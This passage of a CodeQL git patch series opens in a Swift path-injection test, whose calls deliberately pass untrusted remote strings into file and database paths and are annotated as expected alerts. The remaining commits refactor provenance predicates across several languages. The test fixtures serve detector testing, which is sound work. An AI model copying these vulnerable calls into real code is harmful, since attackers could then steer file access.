Configuration()) // $ hasPathInjection=163 let _ = DatabaseSnapshotPool(path: "", configuration: Configuration()) // Safe - let _ = SerializedDatabase(path: remoteString, defaultLabel: "") // $ hasPathInjection=121 + let _ = SerializedDatabase(path: remoteString, defaultLabel: "") // $ hasPathInjection=163 let _ = SerializedDatabase(path: "", defaultLabel: "") // Safe - let _ = SerializedDatabase(path: remoteString, defaultLabel: "", purpose: nil) // $ hasPathInjection=121 + let _ = SerializedDatabase(path: remoteString, defaultLabel: "", purpose: nil) // $ hasPathInjection=163 let _ = SerializedDatabase(path: "", defaultLabel: "", purpose: nil) // Safe - let _ = SerializedDatabase(path: remoteString, configuration: Configuration(), defaultLabel: "") // $ hasPathInjection=121 + let _ = SerializedDatabase(path: remoteString, configuration: Configuration(), defaultLabel: "") // $ hasPathInjection=163 let _ = SerializedDatabase(path: "", configuration: Configuration(), defaultLabel: "") // Safe - let _ = SerializedDatabase(path: remoteString, configuration: Configuration(), defaultLabel: "", purpose: nil) // $ hasPathInjection=121 + let _ = SerializedDatabase(path: remoteString, configuration: Configuration(), defaultLabel: "", purpose: nil) // $ hasPathInjection=163 let _ = SerializedDatabase(path: "", configuration: Configuration(), defaultLabel: "", purpose: nil) // Safe } @@ -208,8 +260,8 @@ func testSanitizers() { let fm = FileManager() let filePath = FilePath(stringLiteral: remoteString) - if (filePath.lexicallyNormalized().starts(with: FilePath(stringLiteral: "/safe"))) { - fm.contents(atPath: remoteString) // Safe + if (filePath.lexicallyNormalized().starts(with: "/safe")) { + let _ = fm.contents(atPath: remoteString) // Safe } - fm.contents(atPath: remoteString) // $ hasPathInjection=206 + let _ = fm.contents(atPath: remoteString) // $ hasPathInjection=258 } From 7422029e49d9e7302e0fa713406e8e426b10b303 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 16 Dec 2022 12:04:47 +0100 Subject: [PATCH 180/381] C#: Re-factor provenance related predicates for summarized callable. --- .../code/csharp/dataflow/ExternalFlow.qll | 5 --- .../dataflow/internal/FlowSummaryImpl.qll | 33 +++++++------- .../internal/FlowSummaryImplSpecific.qll | 43 ++++++------------- .../CaptureDiscardedSummaryModels.ql | 6 ++- .../modelgenerator/CaptureNeutralModels.ql | 4 +- .../modelgenerator/CaptureSummaryModels.ql | 4 +- 6 files changed, 38 insertions(+), 57 deletions(-) diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/ExternalFlow.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/ExternalFlow.qll index 2db7eff0c75..196af2a449d 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/ExternalFlow.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/ExternalFlow.qll @@ -410,11 +410,6 @@ Element interpretElement( ) } -/** - * Holds if `c` has a `generated` summary. - */ -predicate hasSummary(Callable c, boolean generated) { summaryElement(c, _, _, _, generated) } - cached private module Cached { /** diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll index d722aa68b70..b138fbf3417 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImpl.qll @@ -241,15 +241,19 @@ module Public { } /** - * Holds if the summary is auto generated and not manually generated. + * Holds if the summaries that apply to `this` are auto generated and not manually generated. */ - predicate isAutoGenerated() { none() } + final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } /** - * Holds if the summary has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if there exists a manual summary that applies to `this`. */ - predicate hasProvenance(boolean generated) { none() } + final predicate isManual() { this.hasProvenance("manual") } + + /** + * Holds if there exists a summary that applies to `this` that has provenance `provenance`. + */ + predicate hasProvenance(string provenance) { none() } } /** A callable where there is no flow via the callable. */ @@ -259,13 +263,12 @@ module Public { /** * Holds if the neutral is auto generated. */ - predicate isAutoGenerated() { neutralElement(this, true) } + predicate isAutoGenerated() { neutralElement(this, "generated") } /** - * Holds if the neutral has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if the neutral has provenance `provenance`. */ - predicate hasProvenance(boolean generated) { neutralElement(this, generated) } + predicate hasProvenance(string provenance) { neutralElement(this, provenance) } } } @@ -997,12 +1000,12 @@ module Private { private predicate relevantSummaryElementGenerated( AccessPath inSpec, AccessPath outSpec, string kind ) { - summaryElement(this, inSpec, outSpec, kind, true) and - not summaryElement(this, _, _, _, false) + summaryElement(this, inSpec, outSpec, kind, "generated") and + not summaryElement(this, _, _, _, "manual") } private predicate relevantSummaryElement(AccessPath inSpec, AccessPath outSpec, string kind) { - summaryElement(this, inSpec, outSpec, kind, false) + summaryElement(this, inSpec, outSpec, kind, "manual") or this.relevantSummaryElementGenerated(inSpec, outSpec, kind) } @@ -1021,10 +1024,8 @@ module Private { ) } - override predicate isAutoGenerated() { this.relevantSummaryElementGenerated(_, _, _) } - - override predicate hasProvenance(boolean generated) { - summaryElement(this, _, _, _, generated) + override predicate hasProvenance(string provenance) { + summaryElement(this, _, _, _, provenance) } } diff --git a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImplSpecific.qll b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImplSpecific.qll index 251e9ebf5fe..a7511fdf0b0 100644 --- a/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImplSpecific.qll +++ b/csharp/ql/lib/semmle/code/csharp/dataflow/internal/FlowSummaryImplSpecific.qll @@ -97,69 +97,52 @@ DataFlowType getSyntheticGlobalType(SummaryComponent::SyntheticGlobal sg) { result = Gvn::getGlobalValueNumber(any(ObjectType t)) } -bindingset[provenance] -private boolean isGenerated(string provenance) { - provenance = "generated" and result = true - or - provenance != "generated" and result = false -} - /** * Holds if an external flow summary exists for `c` with input specification - * `input`, output specification `output`, kind `kind`, and a flag `generated` - * stating whether the summary is autogenerated. + * `input`, output specification `output`, kind `kind`, and provenance `provenance`. */ -predicate summaryElement(Callable c, string input, string output, string kind, boolean generated) { +predicate summaryElement(Callable c, string input, string output, string kind, string provenance) { exists( - string namespace, string type, boolean subtypes, string name, string signature, string ext, - string provenance + string namespace, string type, boolean subtypes, string name, string signature, string ext | summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, provenance) and - generated = isGenerated(provenance) and c = interpretElement(namespace, type, subtypes, name, signature, ext) ) } /** - * Holds if a neutral model exists for `c`, which means that there is no - * flow through `c`. The flag `generated` states whether the neutral model is autogenerated. + * Holds if a neutral model exists for `c` with provenance `provenace`, + * which means that there is no flow through `c`. */ -predicate neutralElement(Callable c, boolean generated) { - exists(string namespace, string type, string name, string signature, string provenance | +predicate neutralElement(Callable c, string provenance) { + exists(string namespace, string type, string name, string signature | neutralModel(namespace, type, name, signature, provenance) and - generated = isGenerated(provenance) and c = interpretElement(namespace, type, false, name, signature, "") ) } /** * Holds if an external source specification exists for `e` with output specification - * `output`, kind `kind`, and a flag `generated` stating whether the source specification is - * autogenerated. + * `output`, kind `kind`, and provenance `provenance`. */ -predicate sourceElement(Element e, string output, string kind, boolean generated) { +predicate sourceElement(Element e, string output, string kind, string provenance) { exists( - string namespace, string type, boolean subtypes, string name, string signature, string ext, - string provenance + string namespace, string type, boolean subtypes, string name, string signature, string ext | sourceModel(namespace, type, subtypes, name, signature, ext, output, kind, provenance) and - generated = isGenerated(provenance) and e = interpretElement(namespace, type, subtypes, name, signature, ext) ) } /** * Holds if an external sink specification exists for `e` with input specification - * `input`, kind `kind` and a flag `generated` stating whether the sink specification is - * autogenerated. + * `input`, kind `kind` and provenance `provenance`. */ -predicate sinkElement(Element e, string input, string kind, boolean generated) { +predicate sinkElement(Element e, string input, string kind, string provenance) { exists( - string namespace, string type, boolean subtypes, string name, string signature, string ext, - string provenance + string namespace, string type, boolean subtypes, string name, string signature, string ext | sinkModel(namespace, type, subtypes, name, signature, ext, input, kind, provenance) and - generated = isGenerated(provenance) and e = interpretElement(namespace, type, subtypes, name, signature, ext) ) } diff --git a/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql index f16e75b588e..3a2a3454900 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureDiscardedSummaryModels.ql @@ -4,10 +4,12 @@ * @id cs/utils/modelgenerator/discarded-summary-models */ -import semmle.code.csharp.dataflow.ExternalFlow +import semmle.code.csharp.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl import internal.CaptureModels import internal.CaptureSummaryFlow from DataFlowTargetApi api, string flow -where flow = captureFlow(api) and hasSummary(api, false) +where + flow = captureFlow(api) and + api.(FlowSummaryImpl::Public::SummarizedCallable).isManual() select flow order by flow diff --git a/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql index 9149a53116c..933df8c765a 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureNeutralModels.ql @@ -6,12 +6,12 @@ * @tags modelgenerator */ -import semmle.code.csharp.dataflow.ExternalFlow +import semmle.code.csharp.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl import internal.CaptureModels import internal.CaptureSummaryFlow from DataFlowTargetApi api, string noflow where noflow = captureNoFlow(api) and - not hasSummary(api, false) + not api.(FlowSummaryImpl::Public::SummarizedCallable).isManual() select noflow order by noflow diff --git a/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql b/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql index 7002ead8fb4..641c260adf8 100644 --- a/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql +++ b/csharp/ql/src/utils/modelgenerator/CaptureSummaryModels.ql @@ -6,10 +6,10 @@ * @tags modelgenerator */ -import semmle.code.csharp.dataflow.ExternalFlow +import semmle.code.csharp.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl import internal.CaptureModels import internal.CaptureSummaryFlow from DataFlowTargetApi api, string flow -where flow = captureFlow(api) and not hasSummary(api, false) +where flow = captureFlow(api) and not api.(FlowSummaryImpl::Public::SummarizedCallable).isManual() select flow order by flow From ea173f951625da141ab141f67c75089f80b2c5c6 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 16 Dec 2022 13:12:11 +0100 Subject: [PATCH 181/381] Sync files. --- .../go/dataflow/internal/FlowSummaryImpl.qll | 33 ++++++++++--------- .../dataflow/internal/FlowSummaryImpl.qll | 33 ++++++++++--------- .../dataflow/new/internal/FlowSummaryImpl.qll | 33 ++++++++++--------- .../dataflow/internal/FlowSummaryImpl.qll | 33 ++++++++++--------- .../dataflow/internal/FlowSummaryImpl.qll | 33 ++++++++++--------- 5 files changed, 85 insertions(+), 80 deletions(-) diff --git a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll index d722aa68b70..b138fbf3417 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImpl.qll @@ -241,15 +241,19 @@ module Public { } /** - * Holds if the summary is auto generated and not manually generated. + * Holds if the summaries that apply to `this` are auto generated and not manually generated. */ - predicate isAutoGenerated() { none() } + final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } /** - * Holds if the summary has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if there exists a manual summary that applies to `this`. */ - predicate hasProvenance(boolean generated) { none() } + final predicate isManual() { this.hasProvenance("manual") } + + /** + * Holds if there exists a summary that applies to `this` that has provenance `provenance`. + */ + predicate hasProvenance(string provenance) { none() } } /** A callable where there is no flow via the callable. */ @@ -259,13 +263,12 @@ module Public { /** * Holds if the neutral is auto generated. */ - predicate isAutoGenerated() { neutralElement(this, true) } + predicate isAutoGenerated() { neutralElement(this, "generated") } /** - * Holds if the neutral has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if the neutral has provenance `provenance`. */ - predicate hasProvenance(boolean generated) { neutralElement(this, generated) } + predicate hasProvenance(string provenance) { neutralElement(this, provenance) } } } @@ -997,12 +1000,12 @@ module Private { private predicate relevantSummaryElementGenerated( AccessPath inSpec, AccessPath outSpec, string kind ) { - summaryElement(this, inSpec, outSpec, kind, true) and - not summaryElement(this, _, _, _, false) + summaryElement(this, inSpec, outSpec, kind, "generated") and + not summaryElement(this, _, _, _, "manual") } private predicate relevantSummaryElement(AccessPath inSpec, AccessPath outSpec, string kind) { - summaryElement(this, inSpec, outSpec, kind, false) + summaryElement(this, inSpec, outSpec, kind, "manual") or this.relevantSummaryElementGenerated(inSpec, outSpec, kind) } @@ -1021,10 +1024,8 @@ module Private { ) } - override predicate isAutoGenerated() { this.relevantSummaryElementGenerated(_, _, _) } - - override predicate hasProvenance(boolean generated) { - summaryElement(this, _, _, _, generated) + override predicate hasProvenance(string provenance) { + summaryElement(this, _, _, _, provenance) } } diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll index d722aa68b70..b138fbf3417 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImpl.qll @@ -241,15 +241,19 @@ module Public { } /** - * Holds if the summary is auto generated and not manually generated. + * Holds if the summaries that apply to `this` are auto generated and not manually generated. */ - predicate isAutoGenerated() { none() } + final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } /** - * Holds if the summary has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if there exists a manual summary that applies to `this`. */ - predicate hasProvenance(boolean generated) { none() } + final predicate isManual() { this.hasProvenance("manual") } + + /** + * Holds if there exists a summary that applies to `this` that has provenance `provenance`. + */ + predicate hasProvenance(string provenance) { none() } } /** A callable where there is no flow via the callable. */ @@ -259,13 +263,12 @@ module Public { /** * Holds if the neutral is auto generated. */ - predicate isAutoGenerated() { neutralElement(this, true) } + predicate isAutoGenerated() { neutralElement(this, "generated") } /** - * Holds if the neutral has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if the neutral has provenance `provenance`. */ - predicate hasProvenance(boolean generated) { neutralElement(this, generated) } + predicate hasProvenance(string provenance) { neutralElement(this, provenance) } } } @@ -997,12 +1000,12 @@ module Private { private predicate relevantSummaryElementGenerated( AccessPath inSpec, AccessPath outSpec, string kind ) { - summaryElement(this, inSpec, outSpec, kind, true) and - not summaryElement(this, _, _, _, false) + summaryElement(this, inSpec, outSpec, kind, "generated") and + not summaryElement(this, _, _, _, "manual") } private predicate relevantSummaryElement(AccessPath inSpec, AccessPath outSpec, string kind) { - summaryElement(this, inSpec, outSpec, kind, false) + summaryElement(this, inSpec, outSpec, kind, "manual") or this.relevantSummaryElementGenerated(inSpec, outSpec, kind) } @@ -1021,10 +1024,8 @@ module Private { ) } - override predicate isAutoGenerated() { this.relevantSummaryElementGenerated(_, _, _) } - - override predicate hasProvenance(boolean generated) { - summaryElement(this, _, _, _, generated) + override predicate hasProvenance(string provenance) { + summaryElement(this, _, _, _, provenance) } } diff --git a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll index d722aa68b70..b138fbf3417 100644 --- a/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll +++ b/python/ql/lib/semmle/python/dataflow/new/internal/FlowSummaryImpl.qll @@ -241,15 +241,19 @@ module Public { } /** - * Holds if the summary is auto generated and not manually generated. + * Holds if the summaries that apply to `this` are auto generated and not manually generated. */ - predicate isAutoGenerated() { none() } + final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } /** - * Holds if the summary has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if there exists a manual summary that applies to `this`. */ - predicate hasProvenance(boolean generated) { none() } + final predicate isManual() { this.hasProvenance("manual") } + + /** + * Holds if there exists a summary that applies to `this` that has provenance `provenance`. + */ + predicate hasProvenance(string provenance) { none() } } /** A callable where there is no flow via the callable. */ @@ -259,13 +263,12 @@ module Public { /** * Holds if the neutral is auto generated. */ - predicate isAutoGenerated() { neutralElement(this, true) } + predicate isAutoGenerated() { neutralElement(this, "generated") } /** - * Holds if the neutral has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if the neutral has provenance `provenance`. */ - predicate hasProvenance(boolean generated) { neutralElement(this, generated) } + predicate hasProvenance(string provenance) { neutralElement(this, provenance) } } } @@ -997,12 +1000,12 @@ module Private { private predicate relevantSummaryElementGenerated( AccessPath inSpec, AccessPath outSpec, string kind ) { - summaryElement(this, inSpec, outSpec, kind, true) and - not summaryElement(this, _, _, _, false) + summaryElement(this, inSpec, outSpec, kind, "generated") and + not summaryElement(this, _, _, _, "manual") } private predicate relevantSummaryElement(AccessPath inSpec, AccessPath outSpec, string kind) { - summaryElement(this, inSpec, outSpec, kind, false) + summaryElement(this, inSpec, outSpec, kind, "manual") or this.relevantSummaryElementGenerated(inSpec, outSpec, kind) } @@ -1021,10 +1024,8 @@ module Private { ) } - override predicate isAutoGenerated() { this.relevantSummaryElementGenerated(_, _, _) } - - override predicate hasProvenance(boolean generated) { - summaryElement(this, _, _, _, generated) + override predicate hasProvenance(string provenance) { + summaryElement(this, _, _, _, provenance) } } diff --git a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll index d722aa68b70..b138fbf3417 100644 --- a/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll +++ b/ruby/ql/lib/codeql/ruby/dataflow/internal/FlowSummaryImpl.qll @@ -241,15 +241,19 @@ module Public { } /** - * Holds if the summary is auto generated and not manually generated. + * Holds if the summaries that apply to `this` are auto generated and not manually generated. */ - predicate isAutoGenerated() { none() } + final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } /** - * Holds if the summary has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if there exists a manual summary that applies to `this`. */ - predicate hasProvenance(boolean generated) { none() } + final predicate isManual() { this.hasProvenance("manual") } + + /** + * Holds if there exists a summary that applies to `this` that has provenance `provenance`. + */ + predicate hasProvenance(string provenance) { none() } } /** A callable where there is no flow via the callable. */ @@ -259,13 +263,12 @@ module Public { /** * Holds if the neutral is auto generated. */ - predicate isAutoGenerated() { neutralElement(this, true) } + predicate isAutoGenerated() { neutralElement(this, "generated") } /** - * Holds if the neutral has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if the neutral has provenance `provenance`. */ - predicate hasProvenance(boolean generated) { neutralElement(this, generated) } + predicate hasProvenance(string provenance) { neutralElement(this, provenance) } } } @@ -997,12 +1000,12 @@ module Private { private predicate relevantSummaryElementGenerated( AccessPath inSpec, AccessPath outSpec, string kind ) { - summaryElement(this, inSpec, outSpec, kind, true) and - not summaryElement(this, _, _, _, false) + summaryElement(this, inSpec, outSpec, kind, "generated") and + not summaryElement(this, _, _, _, "manual") } private predicate relevantSummaryElement(AccessPath inSpec, AccessPath outSpec, string kind) { - summaryElement(this, inSpec, outSpec, kind, false) + summaryElement(this, inSpec, outSpec, kind, "manual") or this.relevantSummaryElementGenerated(inSpec, outSpec, kind) } @@ -1021,10 +1024,8 @@ module Private { ) } - override predicate isAutoGenerated() { this.relevantSummaryElementGenerated(_, _, _) } - - override predicate hasProvenance(boolean generated) { - summaryElement(this, _, _, _, generated) + override predicate hasProvenance(string provenance) { + summaryElement(this, _, _, _, provenance) } } diff --git a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll index d722aa68b70..b138fbf3417 100644 --- a/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll +++ b/swift/ql/lib/codeql/swift/dataflow/internal/FlowSummaryImpl.qll @@ -241,15 +241,19 @@ module Public { } /** - * Holds if the summary is auto generated and not manually generated. + * Holds if the summaries that apply to `this` are auto generated and not manually generated. */ - predicate isAutoGenerated() { none() } + final predicate isAutoGenerated() { this.hasProvenance("generated") and not this.isManual() } /** - * Holds if the summary has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if there exists a manual summary that applies to `this`. */ - predicate hasProvenance(boolean generated) { none() } + final predicate isManual() { this.hasProvenance("manual") } + + /** + * Holds if there exists a summary that applies to `this` that has provenance `provenance`. + */ + predicate hasProvenance(string provenance) { none() } } /** A callable where there is no flow via the callable. */ @@ -259,13 +263,12 @@ module Public { /** * Holds if the neutral is auto generated. */ - predicate isAutoGenerated() { neutralElement(this, true) } + predicate isAutoGenerated() { neutralElement(this, "generated") } /** - * Holds if the neutral has the given provenance where `true` is - * `generated` and `false` is `manual`. + * Holds if the neutral has provenance `provenance`. */ - predicate hasProvenance(boolean generated) { neutralElement(this, generated) } + predicate hasProvenance(string provenance) { neutralElement(this, provenance) } } } @@ -997,12 +1000,12 @@ module Private { private predicate relevantSummaryElementGenerated( AccessPath inSpec, AccessPath outSpec, string kind ) { - summaryElement(this, inSpec, outSpec, kind, true) and - not summaryElement(this, _, _, _, false) + summaryElement(this, inSpec, outSpec, kind, "generated") and + not summaryElement(this, _, _, _, "manual") } private predicate relevantSummaryElement(AccessPath inSpec, AccessPath outSpec, string kind) { - summaryElement(this, inSpec, outSpec, kind, false) + summaryElement(this, inSpec, outSpec, kind, "manual") or this.relevantSummaryElementGenerated(inSpec, outSpec, kind) } @@ -1021,10 +1024,8 @@ module Private { ) } - override predicate isAutoGenerated() { this.relevantSummaryElementGenerated(_, _, _) } - - override predicate hasProvenance(boolean generated) { - summaryElement(this, _, _, _, generated) + override predicate hasProvenance(string provenance) { + summaryElement(this, _, _, _, provenance) } } From 6a047d6916428cc5d7cdafcafe2d03f0cc1850aa Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 16 Dec 2022 13:36:32 +0100 Subject: [PATCH 182/381] Java: Re-factor provenance related predicates for summarized callable. --- .../internal/FlowSummaryImplSpecific.qll | 40 ++++++------------- .../Summaries/GeneratedVsManualCoverage.ql | 19 ++++----- 2 files changed, 23 insertions(+), 36 deletions(-) diff --git a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImplSpecific.qll b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImplSpecific.qll index 883b791835b..eac1c5379e1 100644 --- a/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImplSpecific.qll +++ b/java/ql/lib/semmle/code/java/dataflow/internal/FlowSummaryImplSpecific.qll @@ -66,13 +66,6 @@ DataFlowType getSyntheticGlobalType(SummaryComponent::SyntheticGlobal sg) { result instanceof TypeObject } -bindingset[provenance] -private boolean isGenerated(string provenance) { - provenance = "generated" and result = true - or - provenance != "generated" and result = false -} - private predicate relatedArgSpec(Callable c, string spec) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext @@ -138,19 +131,17 @@ private predicate correspondingKotlinParameterDefaultsArgSpec( /** * Holds if an external flow summary exists for `c` with input specification - * `input`, output specification `output`, kind `kind`, and a flag `generated` - * stating whether the summary is autogenerated. + * `input`, output specification `output`, kind `kind`, and provenance `provenance`. */ predicate summaryElement( - SummarizedCallableBase c, string input, string output, string kind, boolean generated + SummarizedCallableBase c, string input, string output, string kind, string provenance ) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string provenance, string originalInput, string originalOutput, Callable baseCallable + string originalInput, string originalOutput, Callable baseCallable | summaryModel(namespace, type, subtypes, name, signature, ext, originalInput, originalOutput, kind, provenance) and - generated = isGenerated(provenance) and baseCallable = interpretElement(namespace, type, subtypes, name, signature, ext) and ( c.asCallable() = baseCallable and input = originalInput and output = originalOutput @@ -163,13 +154,12 @@ predicate summaryElement( } /** - * Holds if a neutral model exists for `c`, which means that there is no - * flow through `c`. The flag `generated` states whether the model is autogenerated. + * Holds if a neutral model exists for `c` with provenance `provenance`, + * which means that there is no flow through `c`. */ -predicate neutralElement(SummarizedCallableBase c, boolean generated) { - exists(string namespace, string type, string name, string signature, string provenance | +predicate neutralElement(SummarizedCallableBase c, string provenance) { + exists(string namespace, string type, string name, string signature | neutralModel(namespace, type, name, signature, provenance) and - generated = isGenerated(provenance) and c.asCallable() = interpretElement(namespace, type, false, name, signature, "") ) } @@ -222,16 +212,14 @@ class SourceOrSinkElement = Top; /** * Holds if an external source specification exists for `e` with output specification - * `output`, kind `kind`, and a flag `generated` stating whether the source specification is - * autogenerated. + * `output`, kind `kind`, and provenance `provenance`. */ -predicate sourceElement(SourceOrSinkElement e, string output, string kind, boolean generated) { +predicate sourceElement(SourceOrSinkElement e, string output, string kind, string provenance) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string provenance, SourceOrSinkElement baseSource, string originalOutput + SourceOrSinkElement baseSource, string originalOutput | sourceModel(namespace, type, subtypes, name, signature, ext, originalOutput, kind, provenance) and - generated = isGenerated(provenance) and baseSource = interpretElement(namespace, type, subtypes, name, signature, ext) and ( e = baseSource and output = originalOutput @@ -243,16 +231,14 @@ predicate sourceElement(SourceOrSinkElement e, string output, string kind, boole /** * Holds if an external sink specification exists for `e` with input specification - * `input`, kind `kind` and a flag `generated` stating whether the sink specification is - * autogenerated. + * `input`, kind `kind` and provenance `provenance`. */ -predicate sinkElement(SourceOrSinkElement e, string input, string kind, boolean generated) { +predicate sinkElement(SourceOrSinkElement e, string input, string kind, string provenance) { exists( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string provenance, SourceOrSinkElement baseSink, string originalInput + SourceOrSinkElement baseSink, string originalInput | sinkModel(namespace, type, subtypes, name, signature, ext, originalInput, kind, provenance) and - generated = isGenerated(provenance) and baseSink = interpretElement(namespace, type, subtypes, name, signature, ext) and ( e = baseSink and originalInput = input diff --git a/java/ql/src/Metrics/Summaries/GeneratedVsManualCoverage.ql b/java/ql/src/Metrics/Summaries/GeneratedVsManualCoverage.ql index eb03a785702..a37f2c005ac 100644 --- a/java/ql/src/Metrics/Summaries/GeneratedVsManualCoverage.ql +++ b/java/ql/src/Metrics/Summaries/GeneratedVsManualCoverage.ql @@ -26,15 +26,16 @@ private int getNumMadModeledApis(string package, string provenance) { sc.isAutoGenerated() and provenance = "generated" or - // "manual-only" - sc.hasProvenance(false) and - not sc.hasProvenance(true) and - provenance = "manual" - or - // "both" - sc.hasProvenance(false) and - sc.hasProvenance(true) and - provenance = "both" + sc.isManual() and + ( + if sc.hasProvenance("generated") + then + // "both" + provenance = "both" + else + // "manual-only" + provenance = "manual" + ) ) ) } From 6622eda04c51c986020290861b3bb31f6937c6df Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Fri, 16 Dec 2022 14:53:15 +0100 Subject: [PATCH 183/381] Go: Re-factor provenance related predicates for summarized callable. --- go/ql/lib/semmle/go/dataflow/ExternalFlow.qll | 43 ++++++++----------- .../internal/FlowSummaryImplSpecific.qll | 27 ++++++------ 2 files changed, 31 insertions(+), 39 deletions(-) diff --git a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll index 556c5d3b726..2d7081c46eb 100644 --- a/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll +++ b/go/ql/lib/semmle/go/dataflow/ExternalFlow.qll @@ -124,17 +124,10 @@ predicate sinkModel(string row) { any(SinkModelCsv s).row(row) } /** Holds if `row` is a summary model. */ predicate summaryModel(string row) { any(SummaryModelCsv s).row(row) } -bindingset[input] -private predicate getKind(string input, string kind, boolean generated) { - input.splitAt(":", 0) = "generated" and kind = input.splitAt(":", 1) and generated = true - or - not input.matches("%:%") and kind = input and generated = false -} - /** Holds if a source model exists for the given parameters. */ predicate sourceModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string output, string kind, boolean generated + string output, string kind, string provenance ) { exists(string row | sourceModel(row) and @@ -146,14 +139,15 @@ predicate sourceModel( row.splitAt(";", 4) = signature and row.splitAt(";", 5) = ext and row.splitAt(";", 6) = output and - exists(string k | row.splitAt(";", 7) = k and getKind(k, kind, generated)) + row.splitAt(";", 7) = kind and + provenance = "manual" ) } /** Holds if a sink model exists for the given parameters. */ predicate sinkModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string kind, boolean generated + string input, string kind, string provenance ) { exists(string row | sinkModel(row) and @@ -165,22 +159,23 @@ predicate sinkModel( row.splitAt(";", 4) = signature and row.splitAt(";", 5) = ext and row.splitAt(";", 6) = input and - exists(string k | row.splitAt(";", 7) = k and getKind(k, kind, generated)) + row.splitAt(";", 7) = kind and + provenance = "manual" ) } /** Holds if a summary model exists for the given parameters. */ predicate summaryModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string output, string kind, boolean generated + string input, string output, string kind, string provenance ) { - summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, generated, _) + summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, provenance, _) } /** Holds if a summary model `row` exists for the given parameters. */ predicate summaryModel( string namespace, string type, boolean subtypes, string name, string signature, string ext, - string input, string output, string kind, boolean generated, string row + string input, string output, string kind, string provenance, string row ) { summaryModel(row) and row.splitAt(";", 0) = namespace and @@ -192,7 +187,8 @@ predicate summaryModel( row.splitAt(";", 5) = ext and row.splitAt(";", 6) = input and row.splitAt(";", 7) = output and - exists(string k | 